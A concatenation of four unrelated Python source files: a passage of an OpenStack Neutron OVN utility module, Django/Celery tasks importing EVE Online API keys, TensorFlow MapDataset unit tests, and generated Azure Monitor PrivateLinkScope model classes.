for ip in ips.split(','):
fip_dict_proto.add("{} {}".format(vip, ip))
fip_dict[protocol] = fip_dict_proto
result[fip_id] = fip_dict
return result
def get_network_name_from_datapath(datapath):
return datapath.external_ids['name'].replace('neutron-', '')
def is_port_external(port):
# This port is represented in OVN DB as lsp.type=external
capabilities = []
vnic_type = portbindings.VNIC_NORMAL
if isinstance(port, dict):
capabilities = get_port_capabilities(port)
vnic_type = port.get(portbindings.VNIC_TYPE,
portbindings.VNIC_NORMAL)
else:
if isinstance(port, models_v2.Port):
bindings = port.port_bindings
elif isinstance(port, ports_obj.Port):
bindings = port.bindings
else: # What else could be "port"?
bindings = []
if bindings:
profile = bindings[0].get('profile')
if profile:
# DB object, not OVO, stores the dict in JSON.
profile = (jsonutils.loads(profile) if isinstance(profile, str)
else profile)
capabilities = profile.get(constants.PORT_CAP_PARAM, [])
vnic_type = bindings[0].get('vnic_type', portbindings.VNIC_NORMAL)
return (vnic_type in constants.EXTERNAL_PORT_TYPES and
constants.PORT_CAP_SWITCHDEV not in capabilities)
def connection_config_to_target_string(connection_config):
"""Converts the Neutron NB/SB connection parameter to the OVN target string
:param connection_config: Neutron OVN config parameter for the OVN NB or SB
database. See "ovn_sb_connection" or
"ovn_nb_connection" params.
:returns: (String) OVN NB/SB ``connection.target`` column value.
"""
regex = re.compile(r'^(?P<proto>\w+)\:((?P<ip>.+)\:(?P<port>\d+)|'
r'(?P<file>[\w\/\.]+))')
m = regex.match(connection_config)
if m:
_dict = m.groupdict()
if _dict['ip'] and _dict['port']:
return ('p' + _dict['proto'] + ':' + _dict['port'] + ':' +
_dict['ip'])
elif _dict['file']:
return 'p' + _dict['proto'] + ':' + _dict['file']
| |
import sys
from datetime import datetime, timedelta
from xml.dom import minidom
import logging
from django.conf import settings
from django.contrib.auth.models import User
from django.utils.timezone import now, utc
from celery.task import task
from celery.task.sets import TaskSet
from gargoyle import gargoyle
from eve_proxy.exceptions import *
from eve_proxy.models import CachedDocument
from eve_api.models import EVEAccount, EVEPlayerCharacter
from eve_api.app_defines import *
from eve_api.api_exceptions import *
from eve_api.utils import basic_xml_parse_doc
from eve_api.tasks.character import import_eve_characters
from eve_api.tasks.corporation import import_corp_members, import_corp_details
from sso.tasks import update_user_access
@task(ignore_result=True, expires=120)
def queue_apikey_updates(update_delay=86400, batch_size=50):
"""
Updates all Eve API elements in the database
"""
log = queue_apikey_updates.get_logger()
if gargoyle.is_active('api-disableprocessing'):
log.info("Backend processing disabled, exiting")
return
# Update all the eve accounts and related corps
delta = timedelta(seconds=update_delay)
log.info("Updating APIs older than %s" % (now() - delta))
if gargoyle.is_active('eve-cak'):
accounts = EVEAccount.objects.filter(api_last_updated__lt=(now() - delta)).exclude(api_status__in=[API_STATUS_ACC_EXPIRED, API_STATUS_KEY_EXPIRED, API_STATUS_AUTH_ERROR]).order_by('api_last_updated')[:batch_size]
else:
accounts = EVEAccount.objects.filter(api_last_updated__lt=(now() - delta)).exclude(api_status__in=[API_STATUS_ACC_EXPIRED, API_STATUS_KEY_EXPIRED, API_STATUS_AUTH_ERROR]).exclude(api_keytype__gt=2).order_by('api_last_updated')[:batch_size]
log.info("%s account(s) to update" % accounts.count())
for acc in accounts:
log.debug("Queueing UserID %s for update" % acc.pk)
if not acc.user:
acc.delete()
continue
import_apikey.delay(api_key=acc.api_key, api_userid=acc.pk)
@task(ignore_result=True)
def import_apikey(api_userid, api_key, user=None, force_cache=False, retry=True, **kwargs):
"""
Imports a EVE Account from the API, doesn't return a result
"""
log = import_apikey.get_logger()
try:
import_apikey_func(api_userid, api_key, user, force_cache, log)
except (APIAccessException, DocumentRetrievalError), exc:
log.debug('Error importing API Key - flagging for retry', exc_info=sys.exc_info(), extra={'data': {'api_userid': api_userid, 'api_key': api_key}})
if retry:
import_apikey.retry(args=[api_userid, api_key, user, force_cache], exc=exc, kwargs=kwargs)
else:
raise
@task()
def import_apikey_result(api_userid, api_key, user=None, force_cache=False, callback=None, retry=True, **kwargs):
"""
Imports a EVE Account from the API and returns the account object when completed
"""
log = import_apikey_result.get_logger()
try:
results = import_apikey_func(api_userid, api_key, user, force_cache, log)
except (APIAccessException, DocumentRetrievalError), exc:
log.debug('Error importing API Key - flagging for retry', exc_info=sys.exc_info(), extra={'data': {'api_userid': api_userid, 'api_key': api_key}})
if retry:
import_apikey_result.retry(args=[api_userid, api_key, user, force_cache, callback], exc=exc, kwargs=kwargs)
else:
raise
else:
if callback:
subtask(callback).delay(account=results)
else:
return results
def import_apikey_func(api_userid, api_key, user=None, force_cache=False, log=logging.getLogger(__name__)):
log.debug('Importing %s/%s' % (api_userid, api_key))
try:
account = EVEAccount.objects.get(pk=api_userid)
except EVEAccount.DoesNotExist:
account = None
# Use CAK if enabled and either a new key or flagged as so
if (gargoyle.is_active('eve-cak') and (not account or account.is_cak)):
auth_params = {'keyid': api_userid, 'vcode': api_key}
keycheck = CachedDocument.objects.api_query('/account/APIKeyInfo.xml.aspx', params=auth_params, no_cache=True)
doc = basic_xml_parse_doc(keycheck)['eveapi']
if not 'error' in doc:
if not account:
account, created = EVEAccount.objects.get_or_create(pk=api_userid)
if user:
account.user = User.objects.get(id=user)
if not account.api_key == api_key:
account.api_key = api_key
keydoc = doc['result']['key']
if keydoc['type'] == 'Character':
account.api_keytype = API_KEYTYPE_CHARACTER
elif keydoc['type'] == 'Corporation':
account.api_keytype = API_KEYTYPE_CORPORATION
elif keydoc['type'] == 'Account':
account.api_keytype = API_KEYTYPE_ACCOUNT
account.api_accessmask = int(keydoc['accessMask'])
if not keydoc['expires'] == '':
account.api_expiry = datetime.strptime(keydoc['expires'], '%Y-%m-%d %H:%M:%S').replace(tzinfo=utc)
# Checks account status to see if the account is still active
if not account.api_keytype == API_KEYTYPE_CORPORATION:
if account.has_access(25):
status = CachedDocument.objects.api_query('/account/AccountStatus.xml.aspx', params=auth_params, no_cache=True)
status = basic_xml_parse_doc(status)['eveapi']
if not status.get('error', None):
paiddate = datetime.strptime(status['result']['paidUntil'], '%Y-%m-%d %H:%M:%S').replace(tzinfo=utc)
if paiddate <= now():
account.api_status = API_STATUS_ACC_EXPIRED
else:
account.api_status = API_STATUS_OK
else:
account.api_status = API_STATUS_INVALID_PERMISSIONS
if not account.check_access(getattr(settings, 'EVE_API_MINIMUM_KEYMASK', 59638024)):
account.api_status = API_STATUS_INVALID_PERMISSIONS
else:
# If its a corp key, and we've not errored so far, assume is OK.
account.api_status = API_STATUS_OK
# Remove deleted or traded characters
newcharlist = [int(char['characterID']) for char in doc['result']['key']['characters']]
for char in account.characters.all().exclude(id__in=newcharlist):
account.characters.remove(char)
# Schedule a task to update the characters
if account.user:
cb = update_user_access.subtask(kwargs={'user': account.user.id })
else:
cb = None
import_eve_characters.delay(newcharlist, key_id=account.pk, callback=cb)
else:
# No account object, just return
if not account:
return
if not account.api_key == api_key:
# Attempted change of key failed, ignore
return
error = doc['error']['code']
if int(error) >= 500:
# API disabled, down or rejecting, return without changes
return
elif error in ['202', '203', '204', '205', '212']:
account.api_status = API_STATUS_AUTH_ERROR
elif error == '211':
account.api_status = API_STATUS_ACC_EXPIRED
elif error in ['222', '223']:
account.api_status = API_STATUS_KEY_EXPIRED
elif error in ['221']:
account.api_status = API_STATUS_INVALID_PERMISSIONS
else:
account.api_status = API_STATUS_OTHER_ERROR
if account.user:
update_user_access.delay(account.user.id)
else:
auth_params = {'userid': api_userid, 'apikey': api_key}
account_doc = CachedDocument.objects.api_query('/account/Characters.xml.aspx', params=auth_params, no_cache=force_cache)
doc = basic_xml_parse_doc(account_doc)['eveapi']
if not 'error' in doc:
if not account:
account, created = EVEAccount.objects.get_or_create(pk=api_userid)
if user and not account.user:
account.user = User.objects.get(id=user)
if not account.api_key == api_key:
account.api_key = api_key
account.api_status = API_STATUS_OK
if not account.api_keytype or account.api_keytype == API_KEYTYPE_UNKNOWN:
keycheck = CachedDocument.objects.api_query('/account/AccountStatus.xml.aspx', params=auth_params, no_cache=True)
keydoc = basic_xml_parse_doc(keycheck)['eveapi']
if 'error' in keydoc:
account.api_keytype = API_KEYTYPE_LIMITED
elif not 'error' in keydoc:
account.api_keytype = API_KEYTYPE_FULL
else:
account.api_keytype = API_KEYTYPE_UNKNOWN
# Remove deleted or traded characters
newcharlist = [int(char['characterID']) for char in doc['result']['characters']]
for char in account.characters.all().exclude(id__in=newcharlist):
account.characters.remove(char)
# Schedule a task to update the characters
if account.user:
cb = update_user_access.subtask(kwargs={'user': account.user.id })
else:
cb = None
import_eve_characters.delay(newcharlist, key_id=account.pk, callback=cb)
else:
# No account object, just return
if not account:
return
if not account.api_key == api_key:
# Attempted change of key failed, ignore
return
error = doc['error']['code']
if int(error) >= 500:
# API disabled, down or rejecting, return without changes
return
elif error in ['202', '203', '204', '205', '212']:
account.api_status = API_STATUS_AUTH_ERROR
elif error in ['211', '223']:
account.api_status = API_STATUS_ACC_EXPIRED
else:
account.api_status = API_STATUS_OTHER_ERROR
if account.user:
update_user_access.delay(account.user.id)
account.api_last_updated = now()
account.save()
return account
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def _testDisposeParallelMapDataset(self, explicit_dispose):
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
if explicit_dispose:
dispose_op = iterator.dispose_op()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
if explicit_dispose:
sess.run(dispose_op)
def testExplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(True)
def testImplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(False)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames)
.map(io_ops.read_file, num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class PrivateLinkScopesResource(msrest.serialization.Model):
"""An azure resource object.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Azure resource Id.
:vartype id: str
:ivar name: Azure resource name.
:vartype name: str
:ivar type: Azure resource type.
:vartype type: str
:param location: Required. Resource location.
:type location: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkScopesResource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.location = kwargs['location']
self.tags = kwargs.get('tags', None)
class AzureMonitorPrivateLinkScope(PrivateLinkScopesResource):
"""An Azure Monitor PrivateLinkScope definition.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Azure resource Id.
:vartype id: str
:ivar name: Azure resource name.
:vartype name: str
:ivar type: Azure resource type.
:vartype type: str
:param location: Required. Resource location.
:type location: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:ivar provisioning_state: Current state of this PrivateLinkScope: whether or not is has been
provisioned within the resource group it is defined. Users cannot change this value but are
able to read from it. Values will include Provisioning ,Succeeded, Canceled and Failed.
:vartype provisioning_state: str
:ivar private_endpoint_connections: List of private endpoint connections.
:vartype private_endpoint_connections:
list[~$(python-base-namespace).v2019_10_17.models.PrivateEndpointConnection]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(AzureMonitorPrivateLinkScope, self).__init__(**kwargs)
self.provisioning_state = None
self.private_endpoint_connections = None
class AzureMonitorPrivateLinkScopeListResult(msrest.serialization.Model):
"""Describes the list of Azure Monitor PrivateLinkScope resources.
All required parameters must be populated in order to send to Azure.
:param value: Required. List of Azure Monitor PrivateLinkScope definitions.
:type value: list[~$(python-base-namespace).v2019_10_17.models.AzureMonitorPrivateLinkScope]
:param next_link: The URI to get the next set of Azure Monitor PrivateLinkScope definitions if
too many PrivateLinkScopes where returned in the result set.
:type next_link: str
"""
_validation = {
'value': {'required': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[AzureMonitorPrivateLinkScope]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AzureMonitorPrivateLinkScopeListResult, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = kwargs.get('next_link', None)
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorResponse(msrest.serialization.Model):
"""Describes the format of Error response.
:param code: Error code.
:type code: str
:param message: Error message indicating why the operation failed.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class ErrorResponseCommon(ErrorResponse):
"""The resource management error response.
Variables are only populated by the server, and will be ignored when sending a request.
:param code: Error code.
:type code: str
:param message: Error message indicating why the operation failed.
:type message: str
:ivar details: The error details.
:vartype details: list[~$(python-base-namespace).v2019_10_17.models.ErrorResponseCommon]
:ivar additional_info: The error additional info.
:vartype additional_info:
list[~$(python-base-namespace).v2019_10_17.models.ErrorAdditionalInfo]
"""
_validation = {
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorResponseCommon]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponseCommon, self).__init__(**kwargs)
self.details = None
self.additional_info = None
class OperationStatus(msrest.serialization.Model):
"""The status of operation.
:param id: The operation Id.
:type id: str
:param name: The operation name.
:type name: str
:param start_time: Start time of the job in standard ISO8601 format.
:type start_time: ~datetime.datetime
:param end_time: End time of the job in standard ISO8601 format.
:type end_time: ~datetime.datetime
:param status: The status of the operation.
:type status: str
:param error: The error detail of the operation if any.
:type error: ~$(python-base-namespace).v2019_10_17.models.ErrorResponseCommon
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorResponseCommon'},
}
def __init__(
self,
**kwargs
):
super(OperationStatus, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
self.name = kwargs.get('name', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class ProxyResource(msrest.serialization.Model):
"""An azure resource object.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Azure resource Id.
:vartype id: str
:ivar name: Azure resource name.
:vartype name: str
:ivar type: Azure resource type.
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ProxyResource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
class PrivateEndpointConnection(ProxyResource):
"""A private endpoint connection.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Azure resource Id.
:vartype id: str
:ivar name: Azure resource name.
:vartype name: str
:ivar type: Azure resource type.
:vartype type: str
:param private_endpoint: Private endpoint which the connection belongs to.
:type private_endpoint: ~$(python-base-namespace).v2019_10_17.models.PrivateEndpointProperty
:param private_link_service_connection_state: Connection state of the private endpoint
connection.
:type private_link_service_connection_state:
~$(python-base-namespace).v2019_10_17.models.PrivateLinkServiceConnectionStateProperty
:ivar provisioning_state: State of the private endpoint connection.
:vartype provisioning_state: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpointProperty'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionStateProperty'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.private_endpoint = kwargs.get('private_endpoint', None)
self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None)
self.provisioning_state = None
class PrivateEndpointConnectionListResult(msrest.serialization.Model):
"""A list of private endpoint connections.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: Array of results.
:vartype value: list[~$(python-base-namespace).v2019_10_17.models.PrivateEndpointConnection]
